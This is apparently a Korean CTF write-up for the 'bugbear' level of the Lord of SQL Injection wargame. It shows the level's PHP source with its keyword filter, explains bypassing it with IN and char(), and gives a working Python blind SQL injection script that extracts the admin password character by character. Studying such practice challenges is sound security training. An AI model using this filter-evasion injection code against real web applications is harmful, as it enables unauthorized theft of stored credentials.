WebHacking/Load Of Sql Injection

LOS bugbear

HSr00t 2018. 2. 15. 04:14
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 
<?php 
  include "./config.php"
  login_chk(); 
  dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>
cs


이번 문제는 hex에서 사용되는 0x, like가 막혀있다.
like를 대체할수있는것이 무엇이있을까 문법을 검색하다가 IN을 사용하면 될것같아서 in을 사용하여서 문제를 풀었다.

'가 막혀있기때문에 char을 이용하였다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import urllib2
 
= 1
input_ = 33 #0
passwd = ''
= 0
num = 8
 
while(True):
    url = 'https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no=0%0a||%0aid%0aIN(char(97,100,109,105,110))%0a%26%26%0a'
    url += 'left(right(pw,%d)' %(num)
    url += ',1)%0aIN'
    url += '(char(%d))' %(input_)
    print url
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0')
    req.add_header('cookie','PHPSESSID=p1fad2hverso8kg1fs3fndoof6')
    data = urllib2.urlopen(req).read()
    if '<h2>Hello admin</h2>' in data:
        print 'Search %s' %(chr(input_))
        passwd += chr(input_)
        input_ = 33
        num -= 1
        if len(passwd) == 8:
            break
    else:
        print chr(input_)+'failed'
        input_+=1
 
print 'Key is '+passwd
 
cs


저작자표시 (새창열림)